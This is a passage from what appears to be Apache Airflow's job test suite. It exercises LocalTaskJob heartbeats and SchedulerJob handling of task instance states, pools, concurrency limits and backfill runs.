dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.query(models.Pool).delete()
session.query(models.DagModel).delete()
session.query(SlaMiss).delete()
session.query(errors.ImportError).delete()
session.commit()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exist the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
